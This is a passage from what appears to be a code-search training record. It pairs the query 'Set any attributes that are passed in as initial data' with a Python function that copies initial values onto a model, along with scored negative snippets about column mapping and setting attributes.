'masks@{mn}'.format(mn=mask_name)\n new_mask_mapper = 'masks@{nmn}'.format(nmn=new_mask_name)\n mapper[mask_mapper] = new_mask_mapper\n\n values_mapper = 'lib@values@{mn}'.format(mn=mask_name)\n new_values_mapper = 'lib@values@{nmn}'.format(nmn=new_mask_name)\n mapper[values_mapper] = new_values_mapper\n\n for col_name in list(columns.keys()):\n if col_name in names:\n matches = re.findall(column_pattern, col_name)\n if matches:\n new_col_name = matches[0]\n mapper[col_name] = new_col_name\n col_mapper = 'columns@{mn}'.format(mn=col_name)\n new_col_mapper = 'columns@{nmn}'.format(nmn=new_col_name)\n mapper[col_mapper] = new_col_mapper\n return mapper", "def get_categorical_columns() -> list:\n return [\n \"National Provider Identifier\",\n \"Last Name/Organization Name of the Provider\",\n \"First Name of the Provider\",\n \"Middle Initial of the Provider\",\n \"Credentials of the Provider\",\n \"Gender of the Provider\",\n \"Entity Type of the Provider\",\n \"Street Address 1 of the Provider\",\n \"Street Address 2 of the Provider\",\n \"City of the Provider\",\n \"Zip Code of the Provider\",\n \"State Code of the Provider\",\n \"Country Code of the Provider\",\n \"Provider Type\",\n \"Medicare Participation Indicator\",\n \"Place of Service\",\n \"HCPCS Code\",\n \"HCPCS Description\",\n \"HCPCS Drug Indicator\"\n ]", "def generate_suggestions(self):\n\n track_table = tasks.get_kdbg(self.obj_vm).PoolTrackTable\n\n for pair in self.distance:\n table_base = obj.Object(\"address\", \n offset = track_table - pair[0], \n vm = self.obj_vm)\n\n table_size = obj.Object(\"address\", \n offset = track_table - pair[1], \n vm = self.obj_vm)\n\n if table_size != 0 and self.obj_vm.is_valid_address(table_base):\n break\n\n debug.debug(\"Distance Map: {0}\".format(repr(self.distance)))\n debug.debug(\"PoolTrackTable: {0:#x}\".format(track_table))\n debug.debug(\"PoolBigPageTable: {0:#x} => {1:#x}\".format(table_base.obj_offset, table_base))\n debug.debug(\"PoolBigPageTableSize: {0:#x} => {1:#x}\".format(table_size.obj_offset, table_size))\n yield table_base, table_size", "def get_forward_mapping(self):", "def resolve_from_mappings(mol_list, ligand_mapping, inchi_mapping,\n chebi_mapping):\n new_mapping = {}\n for mol in mol_list: \n smiles = get_smiles_from_mappings(mol, ligand_mapping,\n inchi_mapping, chebi_mapping)\n if smiles:\n new_mapping[mol] = smiles\n return new_mapping", "def columns(self):\n\n return None", "def mapping_names(self):\n return sorted([self.basename] + [name for selector in self.selections.normal_values() for name in selector.mapping_names()])", "def collect_columns():\n return ((x, y) for x in range(72) for y in range(x + 9, 81, 9))", "def get_target_column(self, source, column):\n # Refactor as never called without column\n tbl_col = source + '.' + column\n mapping = self.mapping.get(tbl_col, None)\n # not found? 
We look for wildcards\n if mapping is None:\n # wildcard, we match the source\n\n # partial wildcard, we match only for the table\n partial_pattern = '%s.*' % source\n if partial_pattern in self.mapping:\n if self.mapping[partial_pattern]:\n # In this function we replace the star with the sought\n # column if autoforget is not enabled, or it is present\n # in the target table\n # if column not in self.explicit_columns.get(source, [column]):\n # LOG.warn('Source table %s contains column %s that '\n # 'isn\\'t present in target', (source, column))\n return {k.replace('*', column): v\n for k, v in self.mapping[partial_pattern].items()\n if column in self.explicit_columns.get(source, [column])}\n return {tbl_col: None}\n elif '.*' in self.mapping:\n return {tbl_col: None}\n return mapping", "def all_colormaps():\n maps = [name\n for name in cm.datad.keys()\n if not name.endswith(\"_r\")]\n maps.sort()\n return maps", "def _emphasized_columns(self) -> Iterable[int]:\n return range(self._PRIMARY)", "def base_columns(self):\r\n _base_columns = set(self.all_columns).intersection(set(self.reqd_columns))\r\n return list(_base_columns)", "def get_mapping(cls):\n return {\n \"mappings\": {\n cls.get_mapping_type_name(): {\n \"properties\": {\n 'id': {'type': 'string'},\n 'text': {'type': 'string', 'analyzer': 'snowball'},\n }\n }\n }\n }", "def get_table_columns(self):\n raise NotImplementedError(\"Please implement this method\")", "def cell_map_from_database(self) -> None:\n for row in self.session.query(DatamapItem).all():\n self.cell_map.append(\n Cell(\n datamap_id=row.id,\n cell_key=row.key,\n cell_value=None,\n template_sheet=row.bicc_sheet,\n bg_colour=None,\n fg_colour=None,\n number_format=None,\n verification_list=None,\n cell_reference=row.bicc_cellref))", "def __iter__(self):\r\n for column_id in self._columns.keys():\r\n yield column_id", "def columns(self):\n return self._coldefs", "def _get_cell_map(row: TRowResult) -> Dict[bytes, TCell]:\n if row.sortedColumns is not None:\n return {c.columnName: c.cell for c in row.sortedColumns}\n elif row.columns is not None:\n return row.columns\n else: # pragma: no cover\n raise RuntimeError(\"Neither columns nor sortedColumns is available!\")", "def mapped(self):\n return self.__mapped", "def map_column_to_index(self, col):\n if col in self.column_maps:\n return\n\n # First construct the map from original ids to new ones.\n ids = pd.concat((self.train[col], self.test[col])).unique()\n n = len(ids)\n idmap = dict(itertools.izip(ids, xrange(n)))\n\n # Next use the map to convert the ids in-place.\n self.train.loc[:, col] = self.train[col].apply(lambda _id: idmap[_id])\n self.test.loc[:, col] = self.test[col].apply(lambda _id: idmap[_id])\n\n # Now swap key for value in the idmap to provide a way to convert back.\n reverse_map = {val: key for key, val in idmap.iteritems()}\n self.column_maps[col] = reverse_map", "def origin_columns(self):\n return self.intersection + self.origin_renames", "def collate_fn(self, image_column_names: Optional[List] = None, per_gpu_batch_size: Optional[int] = None) -> Dict:\n fn = {}\n if self.requires_column_info:\n return NotImplementedError(\n f\"requires_column_info={self.requires_column_info} not implemented for OVD tasks.\"\n )\n\n fn.update(\n {\n self.image_key: PadCollator(pad_val=0),\n self.prompt_key: ListCollator(),\n self.image_meta_key: ListCollator(),\n }\n )\n return fn", "def _build_columns_struct(self):\n struct = []\n for column in self.columns:\n struct.append({\n \"id\": column.id,\n \"label\": 
column.label,\n \"pattern\": \"\",\n \"type\": column.type,\n \"p\": column.p}\n )\n return struct", "def mapping(self):\n return self._mapping" ]
[ "0.6701818", "0.66194874", "0.64661616", "0.6289916", "0.62860745", "0.6266867", "0.6198274", "0.6167986", "0.6022413", "0.5931042", "0.5810462", "0.5776295", "0.5758414", "0.5749279", "0.57203007", "0.5662926", "0.5634716", "0.5623659", "0.55996656", "0.5535574", "0.5528489", "0.5524142", "0.55064124", "0.54999566", "0.5457086", "0.54557407", "0.54533345", "0.54453033", "0.54366136", "0.5431268", "0.5430224", "0.54080945", "0.5406593", "0.5392162", "0.53589", "0.53352743", "0.53271204", "0.5327032", "0.5326628", "0.53205055", "0.53014666", "0.5300968", "0.5286402", "0.5286227", "0.525618", "0.5244019", "0.524389", "0.5238036", "0.52271867", "0.52123004", "0.5205679", "0.5187118", "0.5181948", "0.51731163", "0.51719445", "0.5154889", "0.5153462", "0.5153157", "0.5135123", "0.51294094", "0.5124877", "0.5123227", "0.5121135", "0.51196283", "0.5114464", "0.51101017", "0.51079005", "0.5099668", "0.50835365", "0.50808215", "0.50754464", "0.5070447", "0.50620794", "0.5061077", "0.50599414", "0.505792", "0.50469995", "0.5034634", "0.5027022", "0.5008776", "0.5006505", "0.5003667", "0.5001076", "0.49985954", "0.49963453", "0.49869534", "0.49856433", "0.49808922", "0.49775285", "0.49766093", "0.4975227", "0.4972777", "0.49681103", "0.49655855", "0.49497035", "0.49416897", "0.4938525", "0.49326405", "0.49244386", "0.4918949" ]
0.63081527
3
Set any attributes that are passed in as initial data.
def apply_initial_data(model, initial_data):
    for item in initial_data:
        value = initial_data[item]
        if hasattr(model, item):
            setattr(model, item, value)
        elif hasattr(model, 'extra_data') and isinstance(model.extra_data, dict):
            model.extra_data[item] = value
    return model
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _set_attributes(self):", "def __init__(self, **initial_attributes):\n\n for attribute_name, attribute_value in initial_attributes.items():\n setattr(self, attribute_name, attribute_value)", "def init_attrs(self):\n raise NotImplementedError", "def __init__(self, **attributes):\n self.set(**attributes)", "def init_attributes(self):\n # Set default values\n for key, value in self.defaults.items():\n setattr(self, key, value)\n\n # Parse all arguments in kwargs\n for key, value in self.kwargs.items():\n parsed_value = eval_arg(value, key)\n logging.info('Setting ' + str(type(parsed_value)) + ' self.' + str(key) + ' = ' + str(parsed_value))\n setattr(self, key, parsed_value)\n\n # self.today = date_utils.get_datetime_from_timezone(self.date_offset, self.timezone)\n self.today = datetime.datetime.today()", "def __init__(self, **attributes):\n for key, value in attributes.items():\n setattr(self, key, value)", "def set_attributes(self, attributes):\n self.attributes = dict(attributes) # overwrite the existing registry of attributes with the input attributes", "def set_attributes(self, attributes):\n self.attributes = dict(attributes) # overwrite the existing registry of attributes with the input attributes", "def set_attributes(self, attributes):\n self.attributes = dict(attributes) # overwrite the existing registry of attributes with the input attributes", "def set_attributes(self, attributes):\n self.attributes = attributes", "def set_attrs(self, username, attrs):\n pass", "def __init__(self, attrs = None):\n\n if attrs != None:\n self.__dict__.update(attrs)", "def _set_attr(self):\n self.as_skeletal = self._import_as_skeleton()\n self.materials = self._import_materials()\n self.textures = self._import_textures()", "def __init__(self, **attrs):\n \n # set given attributes\n for name, value in attrs.items():\n if hasattr(self, name):\n setattr(self, name, value)\n else:\n raise AttributeError(\"Attribute not found! 
--> %s\" % name)", "def test_attributes_set_from_passed_values(self):\n\n expected_attributes = {\n \"columns\": [\"a\", \"b\", \"c\"],\n \"copy\": False,\n \"verbose\": True,\n }\n\n x = BaseTransformer(**expected_attributes)\n\n h.test_object_attributes(\n obj=x,\n expected_attributes=expected_attributes,\n msg=\"Attributes set in init from passed values\",\n )", "def setup(self, **kwargs):\n\n for k, v in kwargs.items():\n setattr(self, k, v)", "def prepare_node_attrs(self):", "def updateAttrs(self, kwargs):\n for k, v in kwargs.iteritems():\n setattr(self, k, v)", "def _init_attributes(self):\n self.attr = {\n 'name': None,\n 'tags': [],\n 'openHours': None,\n 'type': None,\n 'parent': None,\n 'locationId': None,\n 'bannerAbbreviation': None,\n 'arcGisAbbreviation': None,\n 'geoLocation': None,\n 'geometry': None,\n 'summary': None,\n 'description': None,\n 'descriptionHtml': None,\n 'address': None,\n 'city': None,\n 'state': None,\n 'zip': None,\n 'county': None,\n 'telephone': None,\n 'fax': None,\n 'thumbnails': [],\n 'images': [],\n 'departments': [],\n 'website': None,\n 'sqft': None,\n 'calendar': None,\n 'campus': None,\n 'girCount': None,\n 'girLimit': False,\n 'girLocations': None,\n 'synonyms': [],\n 'bldgId': None,\n 'parkingZoneGroup': None,\n 'propId': None,\n 'adaParkingSpaceCount': None,\n 'motorcycleParkingSpaceCount': None,\n 'evParkingSpaceCount': None,\n 'weeklyMenu': None,\n 'notes': None,\n 'labels': {},\n 'steward': None,\n 'shape': {}\n }", "def add_attributes(data, **kwargs):\n for key in kwargs:\n data[key] = kwargs[key]", "def __init__(self, **kwargs):\n \n default_attr = dict(username='')\n\n allowed_attr = list(default_attr)\n default_attr.update(kwargs)\n\n for key in default_attr:\n if key in allowed_attr:\n self.__dict__[key] = default_attr.get(key)", "def __init__(self, **kwargs):\n # loop over the given kwargs\n for key, value in kwargs.items():\n # treat them like attribute assignments\n setattr(self, key, value)", "def set_attributes(self, new_attributes=None):\n self.attributes = new_attributes", "def _yamlSetAttributes(self, attributes):\n extra = dict([(key, value)\n for key, value in attributes.items()\n if key not in self._yamlAttributeKeys])\n self._preservedExtraAttributes.update(extra)\n\n keys = [key for key in attributes.keys()\n if (key in self._yamlAttributeKeys)\n and (key not in self._yamlSpeciallyHandledAttributes)]\n for key in keys:\n setattr(self, key, attributes[key])", "def set_attrs(self, **kwargs) -> None:\n self._obj.coords[GEO_MAP_COORD].attrs.update(**kwargs)", "def _init_node_attributes(self):\n assert False", "def _setAttributes(self, reactor, done):\n self.reactor = reactor\n self._done = done", "def _set_attributes(self, model):\n\n if model:\n self._get_dict(model)", "def __init__(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)", "def _setAttributes(self, primaryAttr, attrs):\n return False", "def __attrs_post_init__(self):", "def test_default_attributes_set_in_init(self):\n\n x = BaseTransformer()\n\n expected_attributes = {\n \"version_\": tubular._version.__version__,\n \"verbose\": False,\n \"columns\": None,\n \"copy\": True,\n }\n\n h.test_object_attributes(\n obj=x,\n expected_attributes=expected_attributes,\n msg=\"Default attributes set in init\",\n )", "def fill(self, **kwargs):\r\n for name in kwargs.keys():\r\n setattr(self, name, kwargs[name])\r\n return self", "def __init__(self, **kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)", "def __init__(self, 
**kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)", "def __init__(self, **kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)", "def initAttributes(self):\n CCSDS.DU.DataUnit.initAttributes(self)\n self.dataFieldHeaderFlag = 0\n self.setPacketLength()", "def __init__(self, **kwargs: Any):\n for name, value in kwargs.items():\n setattr(self, name, value)", "def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self", "def __init__( self, **kwargs ):\n self.__dict__.update( kwargs )", "def setAttributes(self, args):\n for atr in self.defaultAttributes:\n if args.has_key(atr):\n # convert atr to proper type\n objAttr = getattr(self, atr)\n myType = type(args[atr])\n if type(objAttr) == types.IntType and myType <> types.IntType:\n args[atr] = int(args[atr])\n elif type(objAttr) == types.StringType and myType <> types.StringType:\n args[atr] = str(args[atr])\n elif type(objAttr) == types.ListType and myType <> types.ListType:\n args[atr] = eval(args[atr])\n elif type(objAttr) == types.DictType and myType <> types.DictType:\n args[atr] = eval(args[atr])\n elif type(objAttr) == types.FloatType and myType <> types.FloatType:\n args[atr] = float(args[atr])\n setattr(self, atr, args[atr])", "def set_attributes(self):\n\n self.input_file = None # the InputFile object\n self.namelist = None # the currently selected namelist\n self.file_loaded = False # is an input file loaded or not", "def _setAttribs(self, attribs):\n if attribs:\n # force the state\n self.states.enable('harvested')\n self.__attribs = []\n for i, attrib in enumerate(attribs):\n if isinstance(attrib, dict):\n if not 'name' in attrib:\n raise ValueError, \\\n \"Harvestable: attribute must be a string or \" + \\\n \"a dictionary with 'name'\"\n else:\n attrib = {'name': attrib}\n\n # assign default method to copy\n if not 'copy' in attrib:\n attrib['copy'] = self.__copy_attribs\n\n # check copy method\n if not attrib['copy'] in self._KNOWN_COPY_METHODS:\n raise ValueError, \"Unknown method %s. Known are %s\" % \\\n (attrib['copy'], self._KNOWN_COPY_METHODS)\n\n if not ('obj' in attrib or 'attr' in attrib):\n # Process the item to harvest\n # split into obj, attr. 
If obj is empty, then assume self\n split = attrib['name'].split('.', 1)\n if len(split)==1:\n obj, attr = split[0], None\n else:\n obj, attr = split\n attrib.update({'obj':obj, 'attr':attr})\n\n if attrib['obj'] == '':\n attrib['obj'] = 'self'\n\n # TODO: may be enabling of the states??\n\n self.__attribs.append(attrib) # place value back\n else:\n # just to make sure it is not None or 0\n self.__attribs = []", "def __setstate__(self,values):\n self.initDefault()\n setter = object.__setattr__\n for value,attr in zip(values,self.persistent):\n setter(self,attr,value)\n if self.dirty_sizeCrc == None:\n self.dirty_sizeCrc = {} #--Use empty dict instead.\n self.refreshDataSizeCrc()", "def set_attributes(self):\n s = _setter(oself=self, e1=NameError, e2=AttributeError)\n\n s('oself.coef_ = oself.model.coef_')\n s('oself.intercept_ = oself.model.intercept_')\n\n self.time_prepare = None\n s('oself.time_prepare = oself.model.time_prepare')\n self.time_upload_data = None\n s('oself.time_upload_data = oself.model.time_upload_data')\n self.time_fitonly = None\n s('oself.time_fitonly = oself.model.time_fitonly')", "def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)\n\n for (key, value) in kwargs.iteritems():\n # use setattr so that validation is triggered\n setattr(self, key, value)", "def __init__(self, attrs: Dict[str, Any]) -> None:\n self.attrs = attrs", "def set_params(self,**kwargs):\n for key in kwargs:\n setattr(self, key, kwargs[key])", "def __init__(self,**kwargs):\n self.attr = ['angle','width','height','m','Fg','Fs','Fd','kf','Ff']\n # attributes of the incline in order: angle,width,height, mass,Fg(gravity force),Fs(statical force), Fd (dynamical force),kf(friction coefficient), Ff(friction force)\n self.data = {param: None for param in self.attr}#initialazing data\n self.given_data = set() #set of data given by user\n self.add_data(**kwargs)", "def assign_values(self, data):\n\n for key in self.__dict__.keys():\n if key in data.keys():\n setattr(self, key, data[key]) # handy built-in function", "def set_initial_values(self):\n\n pass", "def set_attr_values(self):\n ats = self.attributes # convenient short name\n for aid in ats:\n value = ats[aid]['nv'] if 'nv' in ats[aid] else (\n ats[aid]['value'] if 'value' in ats[aid] else None)\n if value is not None:\n# self.h5node.attrs[aid] = value\n #- self.file.file_pointer[self.full_path].attrs[aid] = value\n self.file.set_attribute(self.full_path, aid, value)\n #- self.file.h5save_attribute(self.full_path, aid, value)\n #- self.file.h5commands.append(\"set attribute(%s:%s)-%s\" % (self.full_path,\n #- aid, value))", "def __init__(self, data={}):\n self._update_(data)", "def initArgs(self, args):\n ignore = ['self', 'kwargs', 'args']\n for k,v in args.iteritems():\n if k not in ignore: \n setattr(self, k, v)\n pass", "def set_attributes(self, attributes: typing.Dict[str, types.AttributeValue]) -> None:\n if not attributes:\n return\n for key, value in attributes.items():\n self.set_attribute(key, value)", "def _update_attributes(self, data):\n self._set_avatar(data)\n self.boosts_since = parse_boosts_since(data)\n self.flags = parse_flags(data)\n self.nick = parse_nick(data)\n self.pending = parse_pending(data)\n self.role_ids = parse_role_ids(data)\n self.timed_out_until = parse_timed_out_until(data)", "def attributes(self, attributes):\n\n self._attributes = attributes", "def attributes(self, attributes):\n\n self._attributes = attributes", "def __init__(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, 
key, value)", "def setattrs(self, data, attrlist, id_array=None):\n\t\tassert len(data) == len(attrlist)\n\t\tfor d, attr in zip(data, attrlist):\n\t\t\tif id_array == None: setattr(self, attr, d)\n\t\t\telse:getattr(self, attr)[id_array] = d # Setting 1d array elements", "def set_table_attributes(self, attributes):\n self._dirty = True\n if attributes is not None:\n for k, v in attributes.iteritems():\n _key_guard(k, 'Attribute name')\n _str_guard(v, 'Attribute value')\n self._attributes = attributes", "def update(self, **data):\n for attribute in data:\n if hasattr(self, attribute):\n setattr(self, attribute, data[attribute])\n if \"password\" in data:\n self.password = data[\"password\"]", "def read_attributes(self, dataset):\n if 'attributes' in self.configs:\n for key, value in self.configs['attributes'].items():\n setattr(dataset, key, value)", "def __init__(self, **kwargs):\n self.__dict__.update(kwargs)", "def __init__(self, **kwargs):\n self.__dict__.update(kwargs)", "def _set_attrs(ds, **attrs_map):\n for key in attrs_map:\n val = attrs_map[key] # Use Python 2/3 agnostic style\n ds.attrs[key] = val", "def initobj(obj, attrs):\n for a in obj.InstAttr:\n if a != 'id' and a in attrs:\n setattr(obj, a, attrs[a])", "def initobj(obj, attrs):\n for a in obj.InstAttr:\n if a != 'id' and a in attrs:\n setattr(obj, a, attrs[a])", "def set_properties(struct):", "def __extract_common_attrs(self, raw_data: Dict) -> None:\n for attr in self.COMMON_ATTRS:\n if attr not in self.ATTRS and attr in raw_data:\n setattr(self, attr, raw_data[attr])", "def _set_default_attributes(self):\n # Default input attributes\n self._has_studio_override = False\n self._had_studio_override = False\n\n self._is_overriden = False\n self._was_overriden = False\n\n self._is_modified = False\n self._is_invalid = False\n\n self._is_nullable = False\n self._as_widget = False\n self._is_group = False\n\n # If value should be stored to environments\n self._env_group_key = None\n\n self._any_parent_as_widget = None\n self._any_parent_is_group = None\n\n # Parent input\n self._parent = None\n\n # States of inputs\n self._state = None\n self._child_state = None\n\n # Attributes where values are stored\n self.default_value = NOT_SET\n self.studio_value = NOT_SET\n self.override_value = NOT_SET\n\n # Log object\n self._log = None\n\n # Only for develop mode\n self.defaults_not_set = False", "def set_data(data, create_attrs=True, set_values=True, set_values_on_all=False, verbose=True):\n\n def set_value(node, attr, attr_data, verbose=False):\n \"\"\"Sets the value on specifed node from data \"\"\"\n\n keyable = attr_data.get('keyable')\n non_keyable = attr_data.get('non_keyable')\n value = attr_data.get('value')\n attr_type = attr_data.get('type')\n\n excluded_types = ['float2', 'float3', 'double2', 'double3',\n 'compound', 'message', 'short3', 'long2', 'long3']\n try:\n if not mc.objExists(node+'.'+attr):\n if verbose:\n mc.warning('# Attr {0}.{1} doe not exist! 
Skipping..'.format(node, attr))\n return\n\n elif attr_type in excluded_types:\n return\n\n elif attr_type == 'string':\n if not value:\n value = ''\n mc.setAttr(node+'.'+attr, value, type='string')\n\n else:\n mc.setAttr(node+'.'+attr, value)\n\n if verbose:\n print 'Set attribute value: '+node+'.'+attr\n\n except:\n if verbose:\n mc.warning('Could not set '+attr_type+' attr value :'+node+'.'+attr)\n\n def add_attr(node, attr, attr_data, verbose=False):\n \"\"\"Actually add the attribbutes based on attr_dataDict\"\"\"\n\n parent = attr_data.get('parent')\n keyable = attr_data.get('keyable')\n non_keyable = attr_data.get('non_keyable')\n value = attr_data.get('value')\n attr_type = attr_data.get('type')\n\n # get parent and make sure it is a string\n if parent and type(parent) is list:\n parent = parent[0]\n\n # skip if the attr already exists\n if mc.objExists(node+'.'+attr):\n if verbose:\n mc.warning('# Attr {0}.{1} already exists! Skipping..'.format(node, attr))\n return\n\n # add message attrs\n elif attr_type == 'message':\n mc.addAttr(node, ln=attr, at='message')\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n # add compound attrs\n elif attr_type == 'compound':\n number_children = attr_data.get('number_children')\n\n try:\n if parent:\n mc.addAttr(node, ln=attr, at='compound', p=parent, k=keyable, number_children=number_children)\n else:\n mc.addAttr(node, ln=attr, at='compound', k=keyable, number_children=number_children)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n # add string attrs\n elif attr_type == 'string' :\n try:\n if parent:\n mc.addAttr(node, ln=attr, dt='string',p=parent)\n else:\n mc.addAttr(node, ln=attr, dt='string')\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n # add enum attrs\n elif attr_type == 'enum':\n try:\n enum = attr_data.get('enum')\n default_value = attr_data.get('default_value')\n\n if parent:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, en=enum, p=parent)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, en=enum)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n\n elif attr_type == 'bool':\n try:\n default_value = attr_data.get('default_value') or 0\n if parent:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, dv=default_value, p=parent)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, dv=default_value)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n elif attr_type in ['float2', 'float3', 'double2', 'double3', 'short3', 'long2', 'long3']:\n try:\n if parent:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, p=parent)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n else:\n try:\n min_value = attr_data.get('min')\n max_value = attr_data.get('max')\n default_value = attr_data.get('default_value') or 0\n\n if parent:\n if min_value and max_value:\n mc.addAttr(node, ln=attr, min=min_value, max=max_value, at=attr_type, k=keyable, dv=default_value, p=parent)\n elif min_value:\n mc.addAttr(node, ln=attr, 
min=min_value, at=attr_type, k=keyable, dv=default_value, p=parent)\n elif max_value:\n mc.addAttr(node, ln=attr, max=max_value, at=attr_type, k=keyable, dv=default_value, p=parent)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, dv=default_value, p=parent)\n else:\n if min_value is not None and max_value is not None:\n mc.addAttr(node, ln=attr, min=min_value, max=max_value, at=attr_type, k=keyable, dv=default_value)\n elif min_value:\n mc.addAttr(node, ln=attr, min=min_value, at=attr_type, k=keyable, dv=default_value)\n elif max_value:\n mc.addAttr(node, ln=attr, max=max_value, at=attr_type, k=keyable, dv=default_value)\n else:\n mc.addAttr(node, ln=attr, at=attr_type, k=keyable, dv=default_value)\n\n if verbose:\n print 'Added attribute: '+node+'.'+attr\n return True\n\n except:\n mc.warning('# Could not add attr: {0}.{1}'.format(node, attr))\n\n nodes = mc.ls(data.keys())\n\n # first create all compound and child attrs\n if not data:\n return\n\n for node in nodes:\n if verbose:\n print '\\n'\n\n node_data = data.get(node)\n if not node_data:\n continue\n\n node_data = node_data.get('data')\n ordered_attr_list = data.get(node).get('attr_order')\n\n # this is for only setting vcalues on newly created nodes\n # we doint want ot mess with whats already there.\n set_values_for = []\n\n # first create attrs\n if create_attrs:\n for attr in ordered_attr_list:\n attr_data = node_data.get(attr)\n result = add_attr(node, attr, attr_data, verbose=verbose)\n if result:\n set_values_for.append(attr)\n\n if set_values_on_all:\n set_values_for = ordered_attr_list\n\n # then set them\n for attr in set_values_for:\n attr_data = node_data.get(attr)\n set_value(node, attr, attr_data, verbose=verbose)", "def _set_conf_attrs():\n\tdebug_msg = \"initializing the configuration\"\n\tlogger.debug(debug_msg)", "def store_attrs(self, attrs):\n self.get_attr().SetObject(dumps(attrs), False)", "def part(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)", "def __init__(self, **kwargs):\n # TODO: see if i can remove keyword args\n super().__init__()\n self._updateData = {}", "def __init__(self, data):\n # add play_guid as it sometimes doesn't exist\n if 'play_guid' not in data:\n data['play_guid'] = ''\n # loop through data\n for x in data:\n # set information as correct data type\n mlbgame.object.setobjattr(self, x, data[x])", "def initAttributes(self):\n Packet.initAttributes(self)\n self.packetType = TM_PACKET_TYPE", "def _set_attributes_from_dict(self, attrib_names, default_attribs={},\n custom_attrib={}):\n for attr_name in attrib_names:\n if attr_name in custom_attrib:\n attr_val = custom_attrib[attr_name]\n elif attr_name in default_attribs:\n attr_val = default_attribs[attr_name]\n else:\n raise ValueError(\n \"Neither a custom nor a default value is given for the requried attribute {}\".format(\n attr_name))\n\n setattr(self, attr_name, attr_val)", "def __init__(self, **kwds ):\n super(Model, self).__init__()\n self.__key = None \n for name, value in kwds.items():\n self[name] = value", "def update(self, *args, **kwargs):\n if args is not () and args is not None:\n attr_names = [\"id\", \"size\", \"x\", \"y\"]\n for index, attr in enumerate(args):\n setattr(self, attr_names[index], attr)\n else:\n for key, value in kwargs.items():\n if hasattr(self, key):\n setattr(self, key, value)", "def set_attributes(object, attributes):\n for name, attribute in attributes.items():\n setattr(object, name, attribute)", "def __attrs_post_init__(self):\n\n self.jobdate = 
parse(to_str(self.jobdate).strip())\n self.vehicleid = to_str(self.vehicleid).strip()\n self.reason = to_str(self.reason).strip()\n self.notes = to_str(self.notes).strip()\n self.costparts = Decimal(to_str(self.costparts).strip())\n self.costlabor = Decimal(to_str(self.costlabor).strip())\n self.costtotal = Decimal(to_str(self.costtotal).strip())\n\n # Apply additional data transformations\n self.yearmon = datetime.strftime(self.jobdate, '%Y-%m')", "def __setstate__(self, statedict):\n for k, v in list(statedict.items()):\n setattr(self, k, v)", "def __setstate__(self, statedict):\n for k, v in list(statedict.items()):\n setattr(self, k, v)", "def __init_values(self, values):\n for name, value in list(values.items()):\n if name in initializable_parameters:\n setattr(self, name, value)", "def __init__(self, raw_data: Dict) -> None:\n self.raw_data = raw_data\n self.__extract_common_attrs(raw_data)\n\n # Fetch data with DATA_KEY or simply use the initial data.\n # In some cases the DATA_KEY is the same as the object attribute.\n # For example:\n # \"comments\": [{\n # \"comment_id\": 44444,\n # \"comment\": \"Hello, world!\"\n # }]\n # This object has a `comment` attribute but its DATA_KEY is also `comment`:\n # \"comment\": {\"comment_id\": 44444,\n # \"key_id\": 12345,\n # \"comment\": \"This is a test.\"}\n # This is an edge case happening only twice, so to overcome it\n # just check the value type under the given key.\n if self.DATA_KEY in raw_data and \\\n (isinstance(raw_data[self.DATA_KEY], dict)):\n data = raw_data[self.DATA_KEY]\n else:\n data = raw_data\n\n for attr in self.ATTRS:\n setattr(self, attr, data.get(attr, None))", "def _initial_setup(self, **train_kwargs):\n self._update(time_step=0., **train_kwargs)", "def update_from_kwargs(self, **kwargs):\n for (key, value) in kwargs.items():\n setattr(self, key, value)", "def _init(self, **kwds):\n name = kwds.get('name')\n if name and not self.data.has_key('name'):\n self.set_name(name)\n self.characterID = kwds.get('characterID', None)\n self.myName = kwds.get('myName', u'')", "def initDefaults(self, kwargs):\n \n for k,v in self.defaults.iteritems():\n if k in kwargs: # use assigned values\n setattr(self, k, kwargs[k])\n else: # use default values\n setattr(self, k, v)\n \n for k,v in kwargs.iteritems():\n if k not in self.defaults:\n setattr(self, k, v)\n pass", "def set_attributes(self, settings):\n\n for key, value in settings.items():\n self.__dict__[key] = value", "def __init__(self):\n self.relation = ''\n self.attributes = []\n self.attribute_types = dict()\n self.attribute_data = dict()\n self.comment = []\n self.data = []\n pass", "def prepare_data(self):", "def __init__(self, *args, **kwargs):\n self.update(*args, **kwargs)", "def add_attributes(self, attributes):\n self.attributes = dict(self.attributes, **attributes)", "def AssignAttributes(self, attr):\r\n \r\n self.SetAttributes(attr)\r\n self._ownsAttr = True", "def set_properties(self):\n\n # assign feed entries from the root of the parsed data\n if hasattr(self.parsed_data, \"entries\"):\n self.items = self.parsed_data.entries\n\n # check if it is a feed root or feed element\n if hasattr(self.parsed_data, \"feed\"):\n source_data = self.parsed_data.feed\n else:\n source_data = self.parsed_data\n\n # assign available properties not listed in keymap\n self.title = source_data.title\n self.link = source_data.link\n\n for key in self.parsed_data.keymap.keys():\n if hasattr(self, key) and not getattr(self, key):\n attr_value = source_data.get(key)\n if 
